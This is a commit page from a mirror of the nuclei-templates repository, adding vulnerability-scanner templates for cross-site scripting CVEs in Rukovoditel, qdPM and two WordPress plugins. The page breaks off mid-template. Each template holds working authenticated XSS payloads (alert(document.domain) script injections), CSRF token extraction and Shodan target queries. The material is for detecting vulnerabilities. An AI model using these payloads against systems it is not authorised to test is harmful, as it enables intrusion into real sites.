daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #7637 from projectdiscovery/cve-templates4 

CVEs added
patch-1
pussycat0x 2023-07-07 16:46:09 +05:30 committed by GitHub
parent 74440d2fbe 6c7678fcec
commit cb6eaf95a2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
44 changed files with 2262 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
http/cves/2019/CVE-2019-14789.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-2019-14789
info:
name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd
- https://wordpress.org/plugins/custom-404-pro/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2019-14789
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-14789
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
- 'contains(body_2, "Custom 404 Pro")'
condition: and

70
http/cves/2019/CVE-2019-8390.yaml Normal file
View File

@ -0,0 +1,70 @@
id: CVE-2019-8390
info:
name: qdPM 9.1 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.
reference:
- https://www.exploit-db.com/exploits/46399/
- http://qdpm.net/download-qdpm-free-project-management
- https://nvd.nist.gov/vuln/detail/CVE-2019-8390
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-8390
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:762074255
max-request: 3
tags: cve,cve2019,xss,qdpm,authenticated,edb
http:
- raw:
- |
GET /index.php/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=
- |
POST /index.php/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'alert alert-info alert-search-result'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'name="login\[_csrf_token\]" value="(.*?)"'
internal: true

44
http/cves/2020/CVE-2020-19515.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2020-19515
info:
name: qdPM 9.1 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.
reference:
- https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting
- http://qdpm.net/download-qdpm-free-project-management
- https://nvd.nist.gov/vuln/detail/CVE-2020-19515
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-19515
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:762074255
tags: cve,cve2020,xss,qdpm,unauth
http:
- method: GET
path:
- "{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain) />'
- 'qdPM'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

60
http/cves/2020/CVE-2020-35984.yaml Normal file
View File

@ -0,0 +1,60 @@
id: CVE-2020-35984
info:
name: Rukovoditel <= 2.7.2 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.
reference:
- https://github.com/r0ck3t1973/rukovoditel/issues/4
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35984
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-35984
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
max-request: 3
tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

59
http/cves/2020/CVE-2020-35985.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2020-35985
info:
name: Rukovoditel <= 2.7.2 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
reference:
- https://github.com/r0ck3t1973/rukovoditel/issues/3
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35985
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-35985
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=global_lists/lists&action=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

60
http/cves/2020/CVE-2020-35986.yaml Normal file
View File

@ -0,0 +1,60 @@
id: CVE-2020-35986
info:
name: Rukovoditel <= 2.7.2 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
reference:
- https://github.com/r0ck3t1973/rukovoditel/issues/2
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35986
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-35986
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
max-request: 3
tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

59
http/cves/2020/CVE-2020-35987.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2020-35987
info:
name: Rukovoditel <= 2.7.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
reference:
- https://github.com/r0ck3t1973/rukovoditel/issues/1
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35987
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-35987
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/&action=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'

34
http/cves/2022/CVE-2022-4295.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2022-4295
info:
name: Show all comments < 7.0.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.
reference:
- https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56
- https://nvd.nist.gov/vuln/detail/CVE-2022-4295
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-4295
cwe-id: CWE-79
metadata:
verified: true
publicwww-query: /wp-content/plugins/show-all-comments-in-one-page
tags: cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
- 'contains(body, "Select </option>")'
condition: and

61
http/cves/2022/CVE-2022-43164.yaml Normal file
View File

@ -0,0 +1,61 @@
id: CVE-2022-43164
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/4
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43164
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43164
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
max-request: 3
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

60
http/cves/2022/CVE-2022-43165.yaml Normal file
View File

@ -0,0 +1,60 @@
id: CVE-2022-43165
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create".
reference:
- https://github.com/anhdq201/rukovoditel/issues/5
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43165
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43165
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:-1499940355
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

60
http/cves/2022/CVE-2022-43166.yaml Normal file
View File

@ -0,0 +1,60 @@
id: CVE-2022-43166
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity".
reference:
- https://github.com/anhdq201/rukovoditel/issues/2
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43166
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43166
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

60
http/cves/2022/CVE-2022-43167.yaml Normal file
View File

@ -0,0 +1,60 @@
id: CVE-2022-43167
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/7
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43167
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43167
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
max-request: 3
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

59
http/cves/2022/CVE-2022-43169.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2022-43169
info:
name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group".
reference:
- https://github.com/anhdq201/rukovoditel/issues/3
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43169
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43169
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'

60
http/cves/2022/CVE-2022-43170.yaml Normal file
View File

@ -0,0 +1,60 @@
id: CVE-2022-43170
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block".
reference:
- https://github.com/anhdq201/rukovoditel/issues/6
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43170
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43170
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

59
http/cves/2022/CVE-2022-43185.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2022-43185
info:
name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/1
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43185
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43185
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'

61
http/cves/2022/CVE-2022-44944.yaml Normal file
View File

@ -0,0 +1,61 @@
id: CVE-2022-44944
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/14
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44944
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44944
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:-1499940355
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

61
http/cves/2022/CVE-2022-44946.yaml Normal file
View File

@ -0,0 +1,61 @@
id: CVE-2022-44946
info:
name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/15
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44946
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44946
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:-1499940355
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'

61
http/cves/2022/CVE-2022-44947.yaml Normal file
View File

@ -0,0 +1,61 @@
id: CVE-2022-44947
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/13
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44947
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44947
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:-1499940355
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
